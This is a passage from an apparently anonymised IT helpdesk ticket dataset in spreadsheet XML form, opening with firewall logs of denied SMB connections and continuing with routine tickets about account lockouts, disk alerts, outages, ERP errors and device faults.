&quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 1sartlgeo lhqksbdx9:45:56 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58292 dst outside:192.168.1.87/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 1sartlgeo lhqksbdx9:45:57 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58296 dst outside:192.168.0.108/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 1sartlgeo lhqksbdx9:46:02 54.96.80.216 %asa-2-106001: inbound tcp connection denied from 29.26.13.3095/58303 to 10.33.53.207/445 flags syn on interface inside_x000d__x000a_aug 1sartlgeo lhqksbdx9:46:04 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58305 dst outside:192.168.88.104/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 1sartlgeo lhqksbdx9:46:12 54.96.80.216 %asa-2-106001: inbound tcp connection denied from 29.26.13.3095/58316 to 10.59.24.137/445 flags syn on interface inside_x000d__x000a_aug 1sartlgeo lhqksbdx9:46:18 54.96.80.216 %asa-2-106001: inbound tcp connection denied from 29.26.13.3095/58319 to 10.106.15.23/445 flags syn on interface inside_x000d__x000a_aug 1sartlgeo lhqksbdx9:46:29 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58332 dst outside:192.168.21.253/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 1sartlgeo lhqksbdx9:46:30 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58334 dst outside:192.168.1.182/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 1sartlgeo lhqksbdx9:46:31 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58336 dst outside:192.168.0.109/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 1sartlgeo lhqksbdx9:46:33 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58340 dst outside:192.168.43.163/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 1sartlgeo lhqksbdx9:46:35 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58345 dst outside:192.168.43.140/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 1sartlgeo lhqksbdx9:46:38 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58351 dst outside:217.168.208.218/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 1sartlgeo lhqksbdx9:46:41 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58360 dst outside:192.168.1.13/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 1sartlgeo lhqksbdx9:46:43 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58365 dst outside:192.168.0.103/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]"/>
    <s v="gzhapcld fdigznbk"/>
    <x v="19"/>
  </r>
  <r>
    <s v="unlock account  email  in cell phone the users cfgxpvzi dvpnfbrc, recsynqt byoezmla and alexandre pinto"/>
    <s v="hello team,_x000a__x000a_could you please unlock account  email  in cell phone the users cfgxpvzi dvpnfbrc, recsynqt byoezmla and alexandfrre pintfgtyo_x000a__x000a_recsynqt.byoezmla@gmail.com id:vertiayhtu_x000a_cfgxpvzi.dvpnfbrc@gmail.com id:russoddfac_x000a_nmcxfrij.hgaxtqmy@gmail.com id:pintoddsa_x000a__x000a_"/>
    <s v="qasdhyzm yuglsrwx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to submit timecard today"/>
    <s v="unable to submit timecard today"/>
    <s v="mknoeicg aziptqvu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="delete blancog (olifgtmpio gargtcia blagtnco)"/>
    <s v="olifgtmpio gargtcia blagtnco does not working for company anymore since october 2013. i do not know why there is still active ad account for him._x000a_please delete that account as soon as possible as well any other system accounts for blancog (olifgtmpio gargtcia blagtnco)._x000a_"/>
    <s v="kbnfxpsy gehxzayq"/>
    <x v="19"/>
  </r>
  <r>
    <s v="HostName_1015: average (4 samples) disk free on m:\ is now 15%, which is below the warning threshold (15%) "/>
    <s v="HostName_1015: average (4 samples) disk free on m:\ is now 15%, which is below the warning threshold (15%) out of total size 139.4 gb since 02:29pm et on 08/12._x000d__x000a_HostName_1015:average (4 samples) disk free on c:\ is now 15%, which is below the warning threshold (15%) out of total size 100.5 gb"/>
    <s v="vbwszcqn nlbqsuyv"/>
    <x v="11"/>
  </r>
  <r>
    <s v="HostName_236: internal error: unable to find any processes. since 07:49am et on 08/12"/>
    <s v="HostName_236: internal error: unable to find any processes."/>
    <s v="vbwszcqn nlbqsuyv"/>
    <x v="59"/>
  </r>
  <r>
    <s v="HostName_1132: robot is inactive,swap memory usage, unable to find any processes, probe processes failed to start are down."/>
    <s v="HostName_1132: robot HostName_1132 is inactive.._x000d__x000a_HostName_1132:average (5 samples) swap memory usage is now 99.98%, which is above the error threshold (95%)_x000d__x000a_HostName_1132: average (5 samples) memory usage is now 97%, which is above the error threshold (95%)_x000d__x000a_HostName_1132: internal error: unable to find any processes._x000d__x000a_HostName_1132: probe 'processes' failed to start (command = processes.exe) error = (1450) insufficient system resources exist to complete the requested service.  "/>
    <s v="vbwszcqn nlbqsuyv"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to connect to wireless"/>
    <s v="unable to connect to wireless"/>
    <s v="bcxfhekz bplfrnis"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account unlock ybplwrez.lqcyehbf@gmail.com"/>
    <s v="account unlock ybplwrez.lqcyehbf@gmail.com"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1918b"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1918b at 08/12/16 13:12:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0430054"/>
    <s v="ticket update on ticket_no0430054"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to log into my reporting_engineering_tools"/>
    <s v="unable to log into my reporting_engineering_tools"/>
    <s v="vktxjamz whbdetvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update for danghtnuell"/>
    <s v="from: rakthyesh ramdntythanjesh _x000a_sent: friday, august 12, 2016 10:16 pm_x000a_to: bxtqducs zuhoylts_x000a_cc: pvbomqht smfkuhwi_x000a_subject: inc1538753-telephony_software is missing from pc_x000a__x000a_dear cegtcil,_x000a__x000a_danghtnuell  contacted service desk  for assistance on telephony_software issue, kindly assist user on same._x000a__x000a__x000a_kind "/>
    <s v="eqzibjhw ymebpoih"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to view desktop items or folders"/>
    <s v="unable to view desktop items or folders"/>
    <s v="pvbomqht smfkuhwi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="when customer service enters an order for acct #81523266 they get the error sales office not valid for flat rate"/>
    <s v="this is a company account with sales office = fmw1.  on 6/18/16, the shipping conditions was updated to 10 (ground) and the default carrier to tupsgrnd_x000d__x000a__x000d__x000a_bob lewicki requested that i entered a ticket.  his comments :       &quot;i believe that some logic for restricting sales offices was added so that infrastructure would not try to use flat rate, but usa should definitely not be on there. i have copied prishry and rabhtui for input. in the meantime can you please enter a ticket to get it corrected, i believe that it should be able to be adjusted in a table&quot;"/>
    <s v="nkthumgf mwgdenbs"/>
    <x v="12"/>
  </r>
  <r>
    <s v="orders from plant_74 &amp; cpp/tm warehouse will not release.   need fixed urgently"/>
    <s v="_x000a_need urgent help!  see attached document.  example order 35804825 says shipping/receiving pt missing. erp is not recognizing these plants, getting error when trying to add plant_74 as ship/rec plant.  i have checked plant_76 &amp; plant_78 also, same problem.  "/>
    <s v="jrzpcesm oznigwvj"/>
    <x v="17"/>
  </r>
  <r>
    <s v="changed laptop and need my phone activated through this pc"/>
    <s v="please help me log into my phone system using my changed laptop. "/>
    <s v="qcehailo wqynckxg"/>
    <x v="6"/>
  </r>
  <r>
    <s v="enable  access to erp code cv04n to view the drawing."/>
    <s v="enable  access to erp code cv04n to view the drawing."/>
    <s v="ntuhoafg bzwefjvk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="crm issue"/>
    <s v="_x000a__x000a_received from: kpnzvsuw.lwmqyjbv@gmail.com_x000a__x000a_hello_x000a__x000a_  i do not have access to the &quot;forcast to plan&quot; dashbankrd in crm. see attached screenshot._x000a__x000a__x000a__x000a_markhty dale_x000a_sales engineer, illinois (nc3)_x000a_kpnzvsuw.lwmqyjbv@gmail.com&lt;mailto:kpnzvsuw.lwmqyjbv@gmail.com&gt;_x000a_"/>
    <s v="kpnzvsuw lwmqyjbv"/>
    <x v="22"/>
  </r>
  <r>
    <s v="access request to engineering_tools"/>
    <s v="access request to engineering_tools"/>
    <s v="uwiqchfp hnsukjma"/>
    <x v="25"/>
  </r>
  <r>
    <s v="requesting access to s:mgmt drive"/>
    <s v="_x000d__x000a__x000d__x000a_received from: odfimpjg.ptfoiake@gmail.com_x000d__x000a__x000d__x000a_good morning:_x000d__x000a_requesting access to the above file._x000d__x000a__x000d__x000a_"/>
    <s v="odfimpjg ptfoiake"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to access emails from company ipad"/>
    <s v="unable to access emails from company ipad"/>
    <s v="vciknubg wdlkabms"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user unable to log in to outlook"/>
    <s v="user unable to log in to outlook"/>
    <s v="nmpworvu upgtrvnj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to collaboration_platform"/>
    <s v="unable to login to collaboration_platform"/>
    <s v="jcxwgslk szvgufir"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype audio issues"/>
    <s v="_x000a__x000a_received from: qwijaspo.ukynmfig@gmail.com_x000a__x000a_dear it,_x000a__x000a_i continue to have skype audio issues.  i am unable to hear skype calls through my tablet.  when i call in, specifically when i dial into my directors call in number, i hear every third word.  i have had this issue before and had an it tech fix the issue, i will need this done again.  why does this continue to be an issue?_x000a__x000a__x000a_qwijaspo ukynmfig_x000a_sales manager - west coast_x000a_qwijaspo.ukynmfig@gmail.com&lt;mailto:qwijaspo.ukynmfig@gmail.com&gt;_x000a_"/>
    <s v="qwijaspo ukynmfig"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_770:average (4 samples) disk free on g:\ is now 8%"/>
    <s v="HostName_770:average (4 samples) disk free on g:\ is now 8%, which is below the warning threshold (15%) out of total size 200.0 gb"/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="engineering tool doesn't work"/>
    <s v="engineering tool doesn't work"/>
    <s v="ravgfnqp gizaudke"/>
    <x v="62"/>
  </r>
  <r>
    <s v="network outage:russia - warehouse:site is down since at 9:24 am et on 08/12.no backup "/>
    <s v="what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ____9:24 am et on 08/12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na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the pc projector in einstein conf room is not working, it is on but getting no video on the screen."/>
    <s v="the pc projector in einstein conf room is not working, it is on but getting no video on the screen."/>
    <s v="zlpdkqsw jxabdocs"/>
    <x v="2"/>
  </r>
  <r>
    <s v="unable to create delivery for material mm 7150506 against so 35689265 l20.  material completed 11-aug."/>
    <s v="please assign to erp supply_chain team.   apo and ecc systems require synchronization so that a delivery can be created.  material is needed to ship today, 12-august."/>
    <s v="bnoupaki cpeioxdz"/>
    <x v="5"/>
  </r>
  <r>
    <s v="company mails on mobile phone"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ctuodmai.vguwqjtd@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_pl let me know the process to install and start the access of official mail in my smart phone._x000d__x000a_phone details as below._x000d__x000a__x000d__x000a_make: oppo_x000d__x000a_build number: x9009ex_11_a.19_160711_x000d__x000a_imei 1 : 869770024432450_x000d__x000a_imei 2 : 869770024432443_x000d__x000a__x000d__x000a_duel sim mobile._x000d__x000a__x000d__x000a_pl let me know any other details needed._x000d__x000a__x000d__x000a__x000d__x000a_à²•à³ƒà²¤à²œà³à²žà²¤à³†à²—à²³à³ / "/>
    <s v="ctuodmai vguwqjtd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="impact awards//password reset"/>
    <s v="impact awards//password reset"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage:usa refinery - (company):site is hard down since at 9:58 am et on 08/12.no backup circuit."/>
    <s v="what type of outage:  _x____network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___yes______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ____9:58 am et on 08/12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na____    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ___na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oldrctiu bxurpsyi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="replace internal speakers on e7350 due to crackling issue"/>
    <s v="replace internal speakers on e7350 due to crackling issue"/>
    <s v="fnqelwpk ahrskvln"/>
    <x v="2"/>
  </r>
  <r>
    <s v="material posting on production order does not balance requirement quantity on order, does not post on qty withdraw"/>
    <s v="in switzerland, cc 5443: we post material consumption on po 226733620, mat.post. number 5042203075. the material has been discounted in stock and batch, but not posten on the production order (does not show up in the bill of materials)_x000a_there are several orders suffering this problem. we need it solved aerp._x000a_contact: brjkmwvo odxwcpie "/>
    <s v="brjkmwvo odxwcpie"/>
    <x v="44"/>
  </r>
  <r>
    <s v="discounts"/>
    <s v="_x000d__x000a__x000d__x000a_received from: peojqgvm.qayeptuo@gmail.com_x000d__x000a__x000d__x000a_i am having problems submitting a discount_x000d__x000a__x000d__x000a_here is the screen shots im getting_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.jpg@01d1f475.30085b20]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_[cid:image002.jpg@01d1f475.30085b20]_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="peojqgvm qayeptuo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="dell 2in1 7350 device has not been booting despite multiple attempts for a reset or reboot"/>
    <s v="dell 2in1 7350 device has not been booting despite multiple attempts for a reset or reboot_x000d__x000a__x000d__x000a_"/>
    <s v="urgqkinl zpcokgbj"/>
    <x v="2"/>
  </r>
  <r>
    <s v="unable to view credit card statement on ess"/>
    <s v="unable to view credit card statement on ess"/>
    <s v="msbwrchi kdbxtmoq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp newweaver business client locked out."/>
    <s v="erp newweaver business client locked out."/>
    <s v="mqjdyizg amhywoqg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset."/>
    <s v="erp SID_34 password reset."/>
    <s v="feiozqbd uwljchaf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="jcxwgslk szvgufir"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the computer for mii at us_plant facility has got thrown out of company domain"/>
    <s v="the computer for mii has got thrown out of company domain_x000d__x000a__x000d__x000a_please contact ms. dpuifqeo eglwsfkn for further info"/>
    <s v="dpuifqeo eglwsfkn"/>
    <x v="2"/>
  </r>
  <r>
    <s v="network response time"/>
    <s v="at about 8:20 am eastern daylight time, i was on a conference call with usa. the call started dropping out and the only reason i can come up with is a network bottleneck. want to prove or disprove by finding out about the network traffic levels between usa and usa and between usa and the internet during the time the call was made."/>
    <s v="kxsceyzo naokumlb"/>
    <x v="3"/>
  </r>
  <r>
    <s v="erp SID_34 locked out."/>
    <s v="erp SID_34 locked out."/>
    <s v="qipzctgs wjhtbpfr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update for an account lockout"/>
    <s v="ticket update for an account lockout"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to load outlook"/>
    <s v="unable to load outlook"/>
    <s v="hejsrtpz pxqwbulg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="urgent !! need access to all the accounts in iowa, minnesotta, south dakota within crm"/>
    <s v="need access to all the accounts in iowa, minnesotta, south dakota within crm"/>
    <s v="qcxivzag vyucbagx"/>
    <x v="22"/>
  </r>
  <r>
    <s v="account locked"/>
    <s v="account locked"/>
    <s v="nwqktzlx vnlqkgpb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="issue executncqulao qauighdpss programdntys in erp when working on vpn_ _urgent"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rcbdyslq.zuspjbtw@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i have issue when i'm working on vpn form home._x000d__x000a_i 'm not able to run mass programdntys in erp when i'm on vpn. last weekend i had to run mass programdnty to add partners in erp but i was not able. i thought it was security issue but i checked that with security erp team._x000d__x000a_i made uacyltoe hxgaycze when i was in the office and it is working but i can't do the same at home working on vpn._x000d__x000a__x000d__x000a__x000d__x000a_please check with high priority!_x000d__x000a_"/>
    <s v="rcbdyslq zuspjbtw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="discounts error"/>
    <s v="_x000d__x000a__x000d__x000a_received from: itslpwra.vybdkuoa@gmail.com_x000d__x000a__x000d__x000a_[cid:image001.png@01d1f46f.7c80d460]_x000d__x000a__x000d__x000a_best "/>
    <s v="itslpwra vybdkuoa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset the password for yimwfntl rkdwohas on erp / production / erp"/>
    <s v="while trying to log the erp part of erp fro the first time. it would not accept my password and locked me out of the system."/>
    <s v="yimwfntl rkdwohas"/>
    <x v="0"/>
  </r>
  <r>
    <s v="update cutview to lauacyltoe hxgaycze version"/>
    <s v="update cutview to lauacyltoe hxgaycze version and adjust to current ms office installation"/>
    <s v="ihlguasz agnwcqiz"/>
    <x v="66"/>
  </r>
  <r>
    <s v="wi-fi at msg sales not working"/>
    <s v="_x000d__x000a__x000d__x000a_received from: tbloeczi.gxlmeyph@gmail.com_x000d__x000a__x000d__x000a_it-help desk,_x000d__x000a__x000d__x000a_we are unable to connect to wi-fi at msg sales since last two/three weeks._x000d__x000a__x000d__x000a_please note, when this was in lotus discussion room, it was working fine and we could connect the same. however now after it has been shifted to msg sales about month back, we are unable to connect._x000d__x000a_please check and restore at the earliest._x000d__x000a__x000d__x000a_with best "/>
    <s v="tbloeczi gxlmeyph"/>
    <x v="18"/>
  </r>
  <r>
    <s v="when i launch collaboration_platform, my internet browser (ie) will not launch.  others around me are experiencing the same thing."/>
    <s v="when i launch collaboration_platform, my internet browser (ie) will not launch.  others around me are experiencing the same thing."/>
    <s v="zifujpvr vxfkwaqh"/>
    <x v="2"/>
  </r>
  <r>
    <s v="update installation for cutview"/>
    <s v="update cutview to lauacyltoe hxgaycze version and adjust to current ms office installation"/>
    <s v="xcfjusyp glbzpedq"/>
    <x v="66"/>
  </r>
  <r>
    <s v="unlock account  email  in cell phone the user luciano amadeu and zpfitlyu cemvwyso"/>
    <s v="hello team,_x000d__x000a__x000d__x000a_could you please unlock account  email  in cell phone the user luciano amadeu and zpfitlyu cemvwyso_x000d__x000a__x000d__x000a_iaxyjkrz.pctnvdrm@gmail.com id: eulalla_x000d__x000a__x000d__x000a_zpfitlyu.cemvwyso@gmail.com id: silvaes_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="qasdhyzm yuglsrwx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="csscdrill model on configair server not working in SID_34 production"/>
    <s v="csscdrill model on configair server not working in SID_34 production:_x000d__x000a_when starting the csscdrill model from a standard reference product the server responses &quot;500 internal server error&quot; -   error: while trying to invoke the method java.util.list.iterator() of a null object loaded from local variable 'locallist'._x000d__x000a_when starting the csscdrill model from scratch (w/o selecting a standard reference product) configair comes up, but it does not allow me to complete a good configuration._x000d__x000a_the same csscdrill model is working fine in SID_1 uacyltoe hxgaycze environment._x000d__x000a__x000d__x000a_the mill_model model is working fine in SID_1 and SID_34."/>
    <s v="iavozegx jpcudyfi"/>
    <x v="13"/>
  </r>
  <r>
    <s v="lhqsm519:average (4 samples) disk free on h:\ is now 12%"/>
    <s v="average (4 samples) disk free on h:\ is now 12%, which is below the warning threshold (15%) out of total size 200.0 gb"/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="news can not be opened"/>
    <s v="_x000d__x000a__x000d__x000a_received from: uwofavej.hxyatnjc@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_since some days, when the regional news moved to first page of hub, again &amp; again, â€žnews&quot; appear with out â€žmore&quot; to open it or a link in the heading_x000d__x000a__x000d__x000a_this screen print is just before i wrote this email_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01d1f491.67af6c00]_x000d__x000a__x000d__x000a_best "/>
    <s v="uwofavej hxyatnjc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="replace button is missing on dialog box in shopping basket"/>
    <s v="replace button is missing on dialog box in shopping basket when you click on status indicator and msg displays there is a replacement, 'replace' button is missing.  needs to be same as on other grid pages"/>
    <s v="vbmzgsdk jdmyazti"/>
    <x v="21"/>
  </r>
  <r>
    <s v="outlook is not functioning."/>
    <s v="outlook is not functioning."/>
    <s v="quxwtbcr imdwuhbz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="enhancement of storage capacity"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ihmbfeoy.exbgcfsk@gmail.com_x000d__x000a__x000d__x000a_dear sir,_x000d__x000a__x000d__x000a_we do not have sufficient space of following drives in server. request you to enhance the storage capacity of these drives._x000d__x000a__x000d__x000a__x000d__x000a_01)   mtbu_ele(\\HostName_95&lt;file:///\\HostName_95&gt;)_x000d__x000a__x000d__x000a_02)   eplan vault(\\HostName_97&lt;file:///\\HostName_97&gt;)_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="ihmbfeoy exbgcfsk"/>
    <x v="11"/>
  </r>
  <r>
    <s v="mouse issue"/>
    <s v="mouse is not working "/>
    <s v="wrxikemh uqblenpc"/>
    <x v="18"/>
  </r>
  <r>
    <s v="12th aug ,friday on-call - basis"/>
    <s v="_x000a__x000a_received from: mnxbeuso.rfmdlwuo@gmail.com_x000a__x000a_dac / gso team â€“_x000a__x000a_please note the on-call primary/secondary details only for today 12th aug 2016, friday between 23:30 ist to 13th aug 2016, saturday 07:00 ist._x000a__x000a_primary â€“ krisyuhnyrt juvfghtla_x000a_secondary â€“ thomklmas kahtuithra_x000a__x000a_"/>
    <s v="mnxbeuso rfmdlwuo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mandatory condition mwst is missing for order 35805176 customer master 70928858"/>
    <s v="could you please check what is wrong with customer master 81039969? we can't create delivery because there are incomplete log -pricing error: mandatory condition mwst is missing_x000d__x000a_we check with pricing department and mwst is defined for this customer corretly,_x000d__x000a__x000d__x000a_there should be  tax like for turkey tr &quot;tax free trade zone&quot; because customer is from  azerbaijan, maybe has to be added some condition for this country also,_x000d__x000a__x000d__x000a_we have to ship the tools today because it is new order form new distributor with big potential, so priority -2 _x000d__x000a__x000d__x000a_"/>
    <s v="qnstifeb hybrjfex"/>
    <x v="12"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_499"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_499 at 08/12/16 04:40:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="setup new ws\svuxjkpg tpurnjvi"/>
    <s v="setup new ws\svuxjkpg tpurnjvi"/>
    <s v="svuxjkpg tpurnjvi"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup new ws \xovczlad fkicawph"/>
    <s v="setup new ws \xovczlad fkicawph"/>
    <s v="xovczlad fkicawph"/>
    <x v="24"/>
  </r>
  <r>
    <s v="ak - crm in outlook not working"/>
    <s v="_x000a__x000a_received from: wdpzfqgi.zndgqcux@gmail.com_x000a__x000a_hello,_x000a__x000a_can you please help me to solve the following issue?_x000a__x000a__x000a_1.      whenever i want to start outlook, then i get this microsoft dynamics crm message._x000a__x000a_2.      in order to proceed further i have to click Â´Â´stornoÂ´Â´= cancel severeal times (2x or 3x)_x000a__x000a_3.      then the outlook is opened, but there is no connection with crm, which i need._x000a__x000a_[cid:image002.jpg@01d1f482.68356731]_x000a__x000a_s pofgtzdravem / kind "/>
    <s v="wdpzfqgi zndgqcux"/>
    <x v="0"/>
  </r>
  <r>
    <s v="setup new ws \bzekndcu ivhnpdbu"/>
    <s v="setup new ws \bzekndcu ivhnpdbu"/>
    <s v="bzekndcu ivhnpdbu"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup laptop fÃ¼r sandstrahlgerÃ¤t und roboworker\qidgvtwa qvbutayx"/>
    <s v="setuplaptop fÃ¼r sandstrahlgerÃ¤t und roboworker\qidgvtwa qvbutayx"/>
    <s v="qidgvtwa qvbutayx"/>
    <x v="24"/>
  </r>
  <r>
    <s v="mobiltelefon lautsprecher / mikrofon defekt / gestÃ¶rt"/>
    <s v="durchwahl -477_x000d__x000a_mobilteil gigaset sl2_x000d__x000a_lautsprecher / mikrofon kratzen bzw. setzten zeitweise aus"/>
    <s v="tblmnxez ulcmryaf"/>
    <x v="32"/>
  </r>
  <r>
    <s v="can you please help"/>
    <s v="_x000d__x000a__x000d__x000a_received from: smktofel.etsoirbw@gmail.com_x000d__x000a__x000d__x000a_hiï¼Œ_x000d__x000a__x000d__x000a_i want to know how to run the report from finance_app regarding the report of allocation key for cost centers being allocated to different bu, can you please help?_x000d__x000a__x000d__x000a_"/>
    <s v="smktofel etsoirbw"/>
    <x v="54"/>
  </r>
  <r>
    <s v="unable to upload engineering_tool"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ftsqkvre.bqzrupic@gmail.com_x000d__x000a__x000d__x000a_dear sir_x000d__x000a__x000d__x000a_i am unable to upload engineering_tools, the error is showing not connected to the server but application shows connected status. please see the screen shot for your ref._x000d__x000a__x000d__x000a_[cid:image001.png@01d1f49b.61c1bcd0]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="ftsqkvre bqzrupic"/>
    <x v="25"/>
  </r>
  <r>
    <s v="password does not work it says 'account is disabled'"/>
    <s v="password does not work it says 'account is disabled'"/>
    <s v="quxwtbcr imdwuhbz"/>
    <x v="19"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_2049"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_2049 at 08/12/16 02:57:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="vendor payment through bank "/>
    <s v="_x000a__x000a_received from: gnasmtvx.cwxtsvkm@gmail.com_x000a__x000a_hi pradtheyp/nathyresh_x000a__x000a_with effect from tuesday(ie 16.08.2016), we propose make all  vendor payments through bank. in order to facilitate  this process you are requested to make the following changes in the vendor master for all domestic vendors. ( list is enclosed)_x000a__x000a__x000a_1)      house bank id to be changed from itelephony_softwarei bank to bank of amerirtca_x000a__x000a_2)      method of payments should be a,w &amp; c_x000a__x000a_3)      e mail address to be updated in correspondence internet id_x000a__x000a_once the changes are made, please confirm so that we can initiate the first payment to vendors through bank._x000a__x000a__x000a_"/>
    <s v="gnasmtvx cwxtsvkm"/>
    <x v="9"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1960"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1960 at 08/12/16 02:01:24"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="problem in calling through skype"/>
    <s v="_x000a__x000a_received from: ftgvlneh.aitsgqwo@gmail.com_x000a__x000a_dear sir,_x000a__x000a_i am facing problems while individual calling as well as attending meetings on skype._x000a__x000a_whenever i am trying to connect, it is coming &quot;not responding&quot; and skype-app is getting closed &amp; signed out._x000a__x000a_request to pl. resolve the same._x000a__x000a__x000a_for company_x000a__x000a_ftgvlneh aitsgqwo_x000a_asst. mngr. sales â€“ north ( msg)_x000a_ftgvlneh.aitsgqwo@gmail.com&lt;mailto:ftgvlneh.aitsgqwo@gmail.com&gt;_x000a_"/>
    <s v="ftgvlneh aitsgqwo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp routing logic missing for the infrastrcture npr forms."/>
    <s v="pls add the below data in the zsd100 and determine the logic through region._x000d__x000a__x000d__x000a_apac = 51113201 csd_ap_xz    custom solution earth cutting_x000d__x000a_germany = 51111840        csd_na_bdc    bdc usa custom solutions_x000d__x000a_australia = 51112576 csd_aus_drum drum jobs australia_x000d__x000a_poland = 51111844 eng_emea_pz  poland quotes/orders eng programdnty eng_x000d__x000a_amerirtcas = 51111840        csd_na_bdc    bdc usa custom solutions_x000d__x000a_south africa = 51113351 csd_emea_sa  south africa purchasing_x000d__x000a__x000d__x000a_"/>
    <s v="vbmzgsdk jdmyazti"/>
    <x v="21"/>
  </r>
  <r>
    <s v="incorrect  tax code in mm"/>
